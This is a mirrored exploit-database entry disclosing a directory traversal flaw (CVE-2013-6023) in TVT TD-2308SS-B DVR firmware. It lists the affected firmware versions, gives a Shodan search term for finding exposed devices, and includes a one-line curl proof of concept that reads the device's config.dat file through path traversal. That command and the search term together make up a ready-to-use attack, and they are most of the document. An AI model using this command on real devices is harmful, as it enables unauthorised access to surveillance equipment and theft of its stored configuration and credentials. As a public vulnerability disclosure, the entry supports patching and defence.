Skip to content
cyberexploits
webapphardwaretext

TVT TD-2308SS-B DVR - Directory Traversal

TVT TD-2308SS-B DVR - Directory Traversal

Published on 2013-12-01

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/hardware/webapps/29959.txt7eac4c3a
raw
# Exploit Title: TVT TD-2308SS-B DVR directory traversal

# Shodan Dork: "Cross Web Server"

# Date: 01 Dec 2013

# Disclosure date: 10 Sep 2013

# Exploit Author: Cesar Neira

# Vendor Homepage: http://en.tvt.net.cn/

# Affected Firmware Versions:

3.1.43.B

3.1.43.P

3.1.6.P-1.0.2.1-03

3.1.75.B-1.0.2.1-00

3.1.7.B-1.0.2.1-00

3.1.81.B-1.0.2.1-00

3.1.83.B-1.0.2.1-00

3.1.83.P-1.0.4.2-03

3.1.87.P-1.0.4.2-17

3.1.91.P-1.0.2.1-03

3.1.92.P-1.0.2.1-00

3.1.93.B-1.0.2.1-17

3.2.0.B-1.0.2.1-17

3.2.0.P-1.0.2.1-03

3.2.0.P-1.0.2.1-17

3.2.0.P-1.0.6.0.32-00

3.2.0.P-3520A-00

3.2.0.P-3520A-03

3.2.0.P-3531-00

3.2.0.P-3531-11

3.2.0.P-FH-00

3.2.9.P-3520A-06

maybe others.

# Tested on: TVT DVR TD-2308SS-B

# CVE : CVE-2013-6023

# References:

http://www.kb.cert.org/vuls/id/785838

http://alguienenlafisi.blogspot.com/2013/10/dvr-tvt-directory-traversal.html



POC:



curl http://[IP Address]/../../../mnt/mtd/config/config.dat 2>/dev/null | strings



-- 

Cesar Neira <csar.1603@gmail.com>

http://alguienenlafisi.blogspot.com

Root-Node





Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29959.nse
View on GitHub